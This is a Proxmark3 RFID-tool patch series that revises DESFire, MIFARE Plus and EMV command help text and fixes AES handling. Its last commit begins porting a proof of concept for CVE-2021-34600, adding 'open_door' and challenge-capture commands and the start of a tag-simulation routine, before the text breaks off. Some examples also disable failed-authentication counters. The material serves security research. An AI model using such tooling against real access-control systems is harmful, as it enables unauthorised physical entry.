(from 5 to 1) from file 1100 via iso commands", + "hf mfdes read --isoid df01 --fid 00 -s lrp -t aes --length 000010 -> read via lrp channel", + "hf mfdes read --isoid df01 --fid 00 -s ev2 -t aes --length 000010 --isochain -> read desfire light via ev2 channel" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--fid file id (1 hex byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--fid file id (1 hex byte)", "--no-auth execute without authentication", - "--type file type auto/data(standard/backup)/value/record(linear/cyclic)/mac). auto - check file settings and then read. default: auto", - "-o, --offset file offset (3 hex bytes, big endian). for records - record number (0 - lastest record). default 0", - "-l, --length length to read (3 hex bytes, big endian -> 000000 = read all data). for records - records count (0 - all). default 0.", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fileisoid file iso id (iso df id) (2 hex bytes, big endian). works only for iso read commands.", + "--type file type, auto - check file settings and then read. (def: auto)", + "-o, --offset file offset (3 hex bytes, big endian). for records - record number (0 - lastest record). (def: 0)", + "-l, --length length to read (3 hex bytes, big endian -> 000000 = read all data). for records - records count (0 - all). (def: 0)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fileisoid file iso id (iso df id) (2 hex bytes, big endian). works only for iso read commands", "--isochain use iso chaining commands. switched on by default if secure channel = lrp" ], - "usage": "hf mfdes read [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--fid ] [--no-auth] [--type ] [-o ] [-l ] [--appisoid ] [--fileisoid ] [--isochain]" + "usage": "hf mfdes read [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--no-auth] [--type ] [-o ] [-l ] [--isoid ] [--fileisoid ] [--isochain]" }, "hf mfdes selectapp": { "command": "hf mfdes selectapp", @@ -5205,28 +5261,29 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of application for some parameters (3 hex bytes, big endian)", - "--dfname application df name (string, max 16 chars). selects application via iso select command", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of application for some parameters (3 hex bytes, big endian)", + "--dfname application df name (string, max 16 chars). selects application via iso select command", "--mf select mf (master file) via iso channel", - "--isoid application iso id (iso df id) (2 hex bytes, big endian)", - "--fileisoid select file inside application by iso id (iso df id) (2 hex bytes, big endian)." + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fileisoid select file inside application by iso id (iso df id) (2 hex bytes, big endian)." ], - "usage": "hf mfdes selectapp [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--dfname ] [--mf] [--isoid ] [--fileisoid ]" + "usage": "hf mfdes selectapp [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--dfname ] [--mf] [--isoid ] [--fileisoid ]" }, "hf mfdes setconfig": { "command": "hf mfdes setconfig", "description": "set card configuration. warning! danger zone! needs to provide card's master key and works if not blocked by config.", "notes": [ - "more about options mf2dlhx0.pdf. options list:", + "more about options mf2dlhx0.pdf.", + "options list:", "00h picc configuration.", "02h ats update.", "03h sak update", @@ -5240,29 +5297,29 @@ "", "hf mfdes setconfig --param 03 --data 0428 -> set sak", "hf mfdes setconfig --param 02 --data 0875778102637264 -> set ats (first byte - length)", - "hf mfdes setconfig --appisoid df01 -t aes -s ev2 --param 05 --data 00000000020000000000 -> set lrp mode enable for desfire light", - "hf mfdes setconfig --appisoid df01 -t aes -s ev2 --param 0a --data 00ffffffff -> disable failed auth counters for desfire light", - "hf mfdes setconfig --appisoid df01 -t aes -s lrp --param 0a --data 00ffffffff -> disable failed auth counters for desfire light via lrp channel" + "hf mfdes setconfig --isoid df01 -t aes -s ev2 --param 05 --data 00000000020000000000 -> set lrp mode enable for desfire light", + "hf mfdes setconfig --isoid df01 -t aes -s ev2 --param 0a --data 00ffffffff -> disable failed auth counters for desfire light", + "hf mfdes setconfig --isoid df01 -t aes -s lrp --param 0a --data 00ffffffff -> disable failed auth counters for desfire light via lrp" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of application for some parameters (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "-p, --param parameter id (hex 1 byte)", - "-d, --data data for parameter (hex 1..30 bytes)" - ], - "usage": "hf mfdes setconfig [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [-p ] [-d ]" + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of application for some parameters (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian).", + "-p, --param parameter id (1 hex byte)", + "-d, --data data for parameter (1..30 hex bytes)" + ], + "usage": "hf mfdes setconfig [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [-p ] [-d ]" }, "hf mfdes test": { "command": "hf mfdes test", @@ -5282,31 +5339,31 @@ "notes": [ "hf mfdes value --aid 123456 --fid 01 -> get value app=123456, file=01 with defaults from `default` command", "hf mfdes value --aid 123456 --fid 01 --op credit -d 00000001 -> credit value app=123456, file=01 with defaults from `default` command", - "hf mfdes value -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 -> get value with default factory setup", - "hf mfdes val --appisoid df01 --fid 03 -s lrp -t aes -n 1 --op credit --d 00000001 -m encrypt -> credit value in the lrp encrypted mode", - "hf mfdes val --appisoid df01 --fid 03 -s lrp -t aes -n 1 --op get -m plain -> get value in plain (nevertheless of mode) works for desfire light (look setconfiguration option 0x09)" + "hf mfdes value -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 -> get value with default factory setup", + "hf mfdes val --isoid df01 --fid 03 -s lrp -t aes -n 1 --op credit --d 00000001 -m encrypt -> credit value in the lrp encrypted mode", + "hf mfdes val --isoid df01 --fid 03 -s lrp -t aes -n 1 --op get -m plain -> get value in plain (nevertheless of mode) works for desfire light (look setconfiguration option 0x09)" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id (1 hex byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id (1 hex byte)", "-o, --op operation: get(default)/credit/limcredit(limited credit)/debit/clear. operation clear: get-getopt-debit to min value", - "-d, --data value for operation (hex 4 bytes)", + "-d, --data value for operation (hex 4 bytes)", "--no-auth execute without authentication" ], - "usage": "hf mfdes value [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [-o ] [-d ] [--no-auth]" + "usage": "hf mfdes value [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [-o ] [-d ] [--no-auth]" }, "hf mfdes write": { "command": "hf mfdes write", @@ -5323,39 +5380,39 @@ "hf mfdes write --aid 123456 --fid 01 --type record -d 01020304 -> write data to record file", "hf mfdes write --aid 123456 --fid 01 --type record -d 01020304 --updaterec 0 -> update record in the record file. record 0 - lastest record.", "hf mfdes write --aid 123456 --fid 01 --type record --offset 000000 -d 11223344 -> write record to record file. use default channel settings from `default` command", - "hf mfdes write --appisoid 1234 --fileisoid 1000 --type data -c iso -d 01020304 -> write data to std/backup file via iso commandset", - "hf mfdes write --appisoid 1234 --fileisoid 2000 --type record -c iso -d 01020304 -> send record to record file via iso commandset", + "hf mfdes write --isoid 1234 --fileisoid 1000 --type data -c iso -d 01020304 -> write data to std/backup file via iso commandset", + "hf mfdes write --isoid 1234 --fileisoid 2000 --type record -c iso -d 01020304 -> send record to record file via iso commandset", "hf mfdes write --aid 123456 --fid 01 -d 01020304 --readerid 010203 -> write data to file with commitreaderid command before write and committransaction after write", - "hf mfdes write --appisoid df01 --fid 04 -d 01020304 --trkey 00112233445566778899aabbccddeeff --readerid 5532 -t aes -s lrp -> advanced commitreaderid via lrp channel sample" + "hf mfdes write --isoid df01 --fid 04 -d 01020304 --trkey 00112233445566778899aabbccddeeff --readerid 5532 -t aes -s lrp -> advanced commitreaderid via lrp channel sample" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--fid file id (1 hex byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--fid file id (1 hex byte)", "--no-auth execute without authentication", - "--type file type auto/data(standard/backup)/value/record(linear/cyclic)/mac). auto - check file settings and then write. default: auto", - "-o, --offset file offset (3 hex bytes, big endian). for records - record number (0 - lastest record). default 0", + "--type file type, auto - check file settings and then write. (def: auto)", + "-o, --offset file offset (3 hex bytes, big endian). for records - record number (0 - lastest record). (def: 0)", "-d, --data data for write (data/record file), credit/debit(value file)", "--debit use for value file debit operation instead of credit", - "--commit commit needs for backup file only. for the other file types and in the `auto` mode - command set it automatically.", - "--updaterec record number for update record command. updates record instead of write. lastest record - 0", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fileisoid file iso id (iso df id) (2 hex bytes, big endian). works only for iso write commands.", - "--readerid reader id for commitreaderid command. if present - the command issued before write command.", - "--trkey key for decode previous reader id." + "--commit commit needs for backup file only. for the other file types and in the `auto` mode - command set it automatically", + "--updaterec record number for update record command. updates record instead of write. lastest record - 0", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fileisoid file iso id (iso df id) (2 hex bytes, big endian). works only for iso write commands", + "--readerid reader id for commitreaderid command. if present - the command issued before write command", + "--trkey key for decode previous reader id" ], - "usage": "hf mfdes write [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--fid ] [--no-auth] [--type ] [-o ] [-d ] [--debit] [--commit] [--updaterec ] [--appisoid ] [--fileisoid ] [--readerid ] [--trkey ]" + "usage": "hf mfdes write [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--no-auth] [--type ] [-o ] [-d ] [--debit] [--commit] [--updaterec ] [--isoid ] [--fileisoid ] [--readerid ] [--trkey ]" }, "hf mfp auth": { "command": "hf mfp auth", @@ -5367,7 +5424,7 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data.", + "-v, --verbose verbose mode", "--ki key number, 2 hex bytes", "--key key, 16 hex bytes" ], @@ -5375,7 +5432,7 @@ }, "hf mfp chk": { "command": "hf mfp chk", - "description": "checks keys with mifare plus card.", + "description": "checks keys on mifare plus card", "notes": [ "hf mfp chk -k 000102030405060708090a0b0c0d0e0f -> check key on sector 0 as key a and b", "hf mfp chk -s 2 -a -> check default key list on sector 2, key a", @@ -5386,17 +5443,19 @@ "offline": false, "options": [ "-h, --help this help", - "-a, --keya check only key a (by default check all keys).", - "-b, --keyb check only key b (by default check all keys).", - "-k, --key key for checking (hex 16 bytes)", - "-d, --dict file with keys dictionary", + "-a, --keya check only key a (def: check all keys)", + "-b, --keyb check only key b (def: check all keys)", + "-s, --startsec <0..255> start sector number", + "-e, --endsec <0..255> end sector number", + "-k, --key key for checking (hex 16 bytes)", + "-d, --dict dictionary file with keys", "--pattern1b check all 1-byte combinations of key (0000...0000, 0101...0101, 0202...0202, ...)", "--pattern2b check all 2-byte combinations of key (0000...0000, 0001...0001, 0002...0002, ...)", "--startp2b start key (2-byte hex) for 2-byte search (use with `--pattern2b`)", - "-j, --json json file to save keys", - "-v, --verbose verbose mode." + "-j, --json json filename to save keys", + "-v, --verbose verbose mode" ], - "usage": "hf mfp chk [-habv] [-s start sector num (0..255)] [-e end sector num (0..255)] [-k ] [-d ] [--pattern1b] [--pattern2b] [--startp2b ] [-j ]" + "usage": "hf mfp chk [-habv] [-s <0..255>] [-e <0..255>] [-k ] [-d ] [--pattern1b] [--pattern2b] [--startp2b ] [-j ]" }, "hf mfp commitp": { "command": "hf mfp commitp", @@ -5407,7 +5466,7 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data." + "-v, --verbose verbose mode" ], "usage": "hf mfp commitp [-hv]" }, @@ -5433,7 +5492,7 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data.", + "-v, --verbose verbose mode", "-k, --key key, 16 hex bytes" ], "usage": "hf mfp initp [-hv] [-k ]" @@ -5449,13 +5508,13 @@ "options": [ "-h, --help this help", "-v, --verbose show technical data", - "--aid print all sectors with aid", - "-k, --key key for printing sectors", - "-b, --keyb use key b for access printing sectors (by default: key a)", - "--be (optional, bigendian)", + "--aid print all sectors with aid", + "-k, --key key for printing sectors", + "-b, --keyb use key b for access printing sectors (def: key a)", + "--be (optional: bigendian)", "--dch decode card holder information" ], - "usage": "hf mfp mad [-hvb] [--aid ] [-k ] [--be] [--dch]" + "usage": "hf mfp mad [-hvb] [--aid ] [-k ] [--be] [--dch]" }, "hf mfp ndefread": { "command": "hf mfp ndefread", @@ -5487,14 +5546,14 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data", - "-n, --count blocks count (by default 1)", - "-b, --keyb use key b (by default keya)", + "-v, --verbose verbose mode", + "-n, --count blocks count (def: 1)", + "-b, --keyb use key b (def: keya)", "-p, --plain plain communication mode between reader and card", - "--blk block number (0..255)", + "--blk <0..255> block number", "--key key, 16 hex bytes" ], - "usage": "hf mfp rdbl [-hvbp] [-n ] --blk [--key ]" + "usage": "hf mfp rdbl [-hvbp] [-n ] --blk <0..255> [--key ]" }, "hf mfp rdsc": { "command": "hf mfp rdsc", @@ -5506,13 +5565,13 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data.", - "-b, --keyb use key b (by default keya).", - "-p, --plain plain communication mode between reader and card.", - "-s, --sn sector number (0..255)", + "-v, --verbose verbose mode", + "-b, --keyb use key b (def: keya)", + "-p, --plain plain communication mode between reader and card", + "-s, --sn <0..255> sector number", "-k, --key key, 16 hex bytes" ], - "usage": "hf mfp rdsc [-hvbp] -s [-k ]" + "usage": "hf mfp rdsc [-hvbp] -s <0..255> [-k ]" }, "hf mfp wrbl": { "command": "hf mfp wrbl", @@ -5524,13 +5583,13 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data.", - "-b, --keyb use key b (by default keya).", - "--blk block number (0..255)", + "-v, --verbose verbose mode", + "-b, --keyb use key b (def: keya)", + "--blk <0..255> block number", "-d, --data data, 16 hex bytes", "-k, --key key, 16 hex bytes" ], - "usage": "hf mfp wrbl [-hvb] --blk -d [-k ]" + "usage": "hf mfp wrbl [-hvb] --blk <0..255> -d [-k ]" }, "hf mfp wrp": { "command": "hf mfp wrp", @@ -5542,7 +5601,7 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data.", + "-v, --verbose verbose mode", "--ki key number, 2 hex bytes", "--key key, 16 hex bytes" ], @@ -10343,8 +10402,8 @@ } }, "metadata": { - "commands_extracted": 603, + "commands_extracted": 605, "extracted_by": "PM3Help2JSON v1.00", - "extracted_on": "2022-02-05T11:30:03" + "extracted_on": "2022-02-09T14:20:29" } } \ No newline at end of file diff --git a/doc/commands.md b/doc/commands.md index 0890285adb..35444f00b5 100644 --- a/doc/commands.md +++ b/doc/commands.md @@ -137,17 +137,17 @@ Check column "offline" for their availability. |command |offline |description |------- |------- |----------- |`emv help `|Y |`This help` -|`emv exec `|N |`Executes EMV contactless transaction.` -|`emv pse `|N |`Execute PPSE. It selects 2PAY.SYS.DDF01 or 1PAY.SYS.DDF01 directory.` -|`emv search `|N |`Try to select all applets from applets list and print installed applets.` -|`emv select `|N |`Select applet.` -|`emv gpo `|N |`Execute GetProcessingOptions.` -|`emv readrec `|N |`Read files from card.` -|`emv genac `|N |`Generate ApplicationCryptogram.` -|`emv challenge `|N |`Generate challenge.` -|`emv intauth `|N |`Internal authentication.` -|`emv scan `|N |`Scan EMV card and save it contents to json file for emulator.` -|`emv test `|Y |`Crypto logic test.` +|`emv exec `|N |`Executes EMV contactless transaction` +|`emv pse `|N |`Execute PPSE. It selects 2PAY.SYS.DDF01 or 1PAY.SYS.DDF01 directory` +|`emv search `|N |`Try to select all applets from applets list and print installed applets` +|`emv select `|N |`Select applet` +|`emv gpo `|N |`Execute GetProcessingOptions` +|`emv readrec `|N |`Read files from card` +|`emv genac `|N |`Generate ApplicationCryptogram` +|`emv challenge `|N |`Generate challenge` +|`emv intauth `|N |`Internal authentication` +|`emv scan `|N |`Scan EMV card and save it contents to json file for emulator` +|`emv test `|Y |`Crypto logic test` |`emv list `|Y |`List ISO7816 history` |`emv roca `|N |`Extract public keys and run ROCA test` @@ -252,6 +252,8 @@ Check column "offline" for their availability. |`hf cipurse formatall `|N |`Erase all the data from chip` |`hf cipurse create `|N |`Create file, application, key via DGI record` |`hf cipurse delete `|N |`Delete file` +|`hf cipurse updkey `|N |`Update key` +|`hf cipurse updakey `|N |`Update key attributes` |`hf cipurse default `|N |`Set default key and file id for all the other commands` |`hf cipurse test `|Y |`Tests` From 611dbbc89231974a51c0404cf862344fd440b107 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ya=C5=9Far=20Klawohn?= Date: Wed, 9 Feb 2022 15:21:34 +0100 Subject: [PATCH 2/3] Fix device desfire AES en-/decryption This commit fixes `mifare_cypher_single_block()` when used with `T_AES`. `mifare_cypher_single_block()` essentially re-implements CBC mode for all used ciphers by XOR-ing the IV with the data either before encryption or after decryption and using AES in ECB mode. However, for AES encryption `mbedtls_aes_crypt_cbc()` was then called to perform the en-/decryption operation, which then also XOR-ed the IV with the data, all of which resulted in the wrong en-/decryption of the data. This is fixed by replacing the call to `mbedtls_aes_crypt_cbc()` with a call to `mbedtls_aes_crypt_ecb()`. --- armsrc/desfire_crypto.c | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/armsrc/desfire_crypto.c b/armsrc/desfire_crypto.c index 84361e2c34..9dbf951ebf 100644 --- a/armsrc/desfire_crypto.c +++ b/armsrc/desfire_crypto.c @@ -612,7 +612,9 @@ void *mifare_cryto_postprocess_data(desfiretag_t tag, void *data, size_t *nbytes break; } - free(edata); + // TODO it doesn't build with this uncommented + // desfire_crypto.c:(.text.mifare_cryto_postprocess_data+0x4c): undefined reference to `free' + //free(edata); break; case MDCM_ENCIPHERED: @@ -811,13 +813,13 @@ void mifare_cypher_single_block(desfirekey_t key, uint8_t *data, uint8_t *ivect, case MCO_ENCYPHER: { mbedtls_aes_init(&actx); mbedtls_aes_setkey_enc(&actx, key->data, 128); - mbedtls_aes_crypt_cbc(&actx, MBEDTLS_AES_ENCRYPT, sizeof(edata), ivect, data, edata); + mbedtls_aes_crypt_ecb(&actx, MBEDTLS_AES_ENCRYPT, data, edata); break; } case MCO_DECYPHER: { mbedtls_aes_init(&actx); mbedtls_aes_setkey_dec(&actx, key->data, 128); - mbedtls_aes_crypt_cbc(&actx, MBEDTLS_AES_DECRYPT, sizeof(edata), ivect, edata, data); + mbedtls_aes_crypt_ecb(&actx, MBEDTLS_AES_DECRYPT, data, edata); break; } } From 5fd35c5980e196d8e40f41537a95f7afa4718a6c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ya=C5=9Far=20Klawohn?= Date: Wed, 9 Feb 2022 15:36:01 +0100 Subject: [PATCH 3/3] Port CVE-2021-34600 poc Add support for performing the attack on systems affected by CVE-2021-34600. For this, this commit adds the commands `hf mfdesbrute get_challenge` and `hf mfdesbrute open_door`. --- armsrc/Makefile | 2 +- armsrc/appmain.c | 23 + armsrc/mfdessimulate.c | 832 ++++++++++++++++++++++++++++++++ armsrc/mfdessimulate.h | 10 + client/CMakeLists.txt | 1 + client/Makefile | 1 + client/src/cmdhf.c | 2 + client/src/cmdhfmfdesbrute.c | 246 ++++++++++ client/src/cmdhfmfdesbrute.h | 28 ++ client/src/pm3line_vocabulory.h | 3 + doc/commands.json | 43 +- doc/commands.md | 11 + include/pm3_cmd.h | 3 + include/protocols.h | 5 + 14 files changed, 1202 insertions(+), 8 deletions(-) create mode 100644 armsrc/mfdessimulate.c create mode 100644 armsrc/mfdessimulate.h create mode 100644 client/src/cmdhfmfdesbrute.c create mode 100644 client/src/cmdhfmfdesbrute.h diff --git a/armsrc/Makefile b/armsrc/Makefile index 968dc445d7..60839e110a 100644 --- a/armsrc/Makefile +++ b/armsrc/Makefile @@ -36,7 +36,7 @@ APP_CFLAGS = $(PLATFORM_DEFS) \ SRC_LF = lfops.c lfsampling.c pcf7931.c lfdemod.c lfadc.c SRC_ISO15693 = iso15693.c iso15693tools.c -SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c epa.c mifaresim.c +SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c epa.c mifaresim.c mfdessimulate.c #UNUSED: mifaresniff.c SRC_ISO14443b = iso14443b.c SRC_FELICA = felica.c diff --git a/armsrc/appmain.c b/armsrc/appmain.c index 22871a00d7..c6a72945b3 100644 --- a/armsrc/appmain.c +++ b/armsrc/appmain.c @@ -52,6 +52,7 @@ #include "lfzx.h" #include "mifarecmd.h" #include "mifaredesfire.h" +#include "mfdessimulate.h" #include "mifaresim.h" #include "pcf7931.h" #include "Standalone/standalone.h" @@ -1657,6 +1658,28 @@ static void PacketReceived(PacketCommandNG *packet) { MifareHasStaticNonce(); break; } + case CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE: { + struct p { + uint8_t tagtype; + uint16_t flags; + uint8_t uid[10]; + uint8_t key[16]; + } PACKED; + struct p *payload = (struct p *) packet->data.asBytes; + SimulateMfDesfireEv1(payload->tagtype, payload->flags, payload->uid, payload->key, CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE); + break; + } + case CMD_HF_MIFARE_EV1_OPEN_DOOR: { + struct p { + uint8_t tagtype; + uint16_t flags; + uint8_t uid[10]; + uint8_t key[16]; + } PACKED; + struct p *payload = (struct p *) packet->data.asBytes; + SimulateMfDesfireEv1(payload->tagtype, payload->flags, payload->uid, payload->key, CMD_HF_MIFARE_EV1_OPEN_DOOR); + break; + } #endif #ifdef WITH_NFCBARCODE diff --git a/armsrc/mfdessimulate.c b/armsrc/mfdessimulate.c new file mode 100644 index 0000000000..ba66ee93d8 --- /dev/null +++ b/armsrc/mfdessimulate.c @@ -0,0 +1,832 @@ +//----------------------------------------------------------------------------- +// Copyright (C) X41 D-Sec GmbH, Yasar Klawohn, Markus Vervier +// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details. +// +// This program is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// This program is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// See LICENSE.txt for the text of the license. +//----------------------------------------------------------------------------- +// Routines to support ISO 14443 type A. +//----------------------------------------------------------------------------- +#include "mfdessimulate.h" + +#include "string.h" +#include "proxmark3_arm.h" +#include "cmd.h" +#include "appmain.h" +#include "BigBuf.h" +#include "fpgaloader.h" +#include "ticks.h" +#include "dbprint.h" +#include "util.h" +#include "util.h" +#include "parity.h" +#include "mifareutil.h" +#include "commonutil.h" +#include "crc16.h" +#include "protocols.h" +#include "mbedtls/aes.h" +#include "desfire_crypto.h" + +#define MAX_ISO14A_TIMEOUT 524288 + +bool test_emulate_reader(uint8_t test_counter, uint8_t *receivedCmd, int *len); + +void test_verify_tag_response(uint8_t test_counter, uint8_t *sent_test_cmd, + uint8_t sent_test_cmd_len); + +//============================================================================= +// ISO 14443 Type A - Miller decoder +//============================================================================= +// Basics: +// This decoder is used when the PM3 acts as a tag. +// The reader will generate "pauses" by temporarily switching of the field. +// At the PM3 antenna we will therefore measure a modulated antenna voltage. +// The FPGA does a comparison with a threshold and would deliver e.g.: +// ........ 1 1 1 1 1 1 0 0 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 1 1 1 1 ....... +// The Miller decoder needs to identify the following sequences: +// 2 (or 3) ticks pause followed by 6 (or 5) ticks unmodulated: pause at beginning - Sequence Z ("start of communication" or a "0") +// 8 ticks without a modulation: no pause - Sequence Y (a "0" or "end of communication" or "no information") +// 4 ticks unmodulated followed by 2 (or 3) ticks pause: pause in second half - Sequence X (a "1") +// Note 1: the bitstream may start at any time. We therefore need to sync. +// Note 2: the interpretation of Sequence Y and Z depends on the preceding sequence. +//----------------------------------------------------------------------------- +static tUart14a Uart; + +//----------------------------------------------------------------------------- +// Main loop of simulated tag: receive commands from reader, decide what +// response to send, and send it. +// 'hf mfdesbrute (get_challenge|open_door)' +//----------------------------------------------------------------------------- +void SimulateMfDesfireEv1(uint8_t tagType, uint16_t flags, uint8_t *uid, uint8_t *enc_key, int purpose) { + + tag_response_info_t *responses; + uint32_t cuid = 0; + uint32_t counters[3] = { 0x00, 0x00, 0x00 }; + uint8_t tearings[3] = { 0xbd, 0xbd, 0xbd }; + uint8_t pages = 0; + + // command buffers + uint8_t receivedCmd[MAX_FRAME_SIZE] = { 0x00 }; + uint8_t receivedCmdPar[MAX_PARITY_SIZE] = { 0x00 }; + + // free eventually allocated BigBuf memory but keep Emulator Memory + BigBuf_free_keep_EM(); + + if (SimulateIso14443aInit(tagType, flags, uid, &responses, &cuid, counters, tearings, &pages) == false) { + BigBuf_free_keep_EM(); + reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0); + return; + } + + // We need to listen to the high-frequency, peak-detected path. + 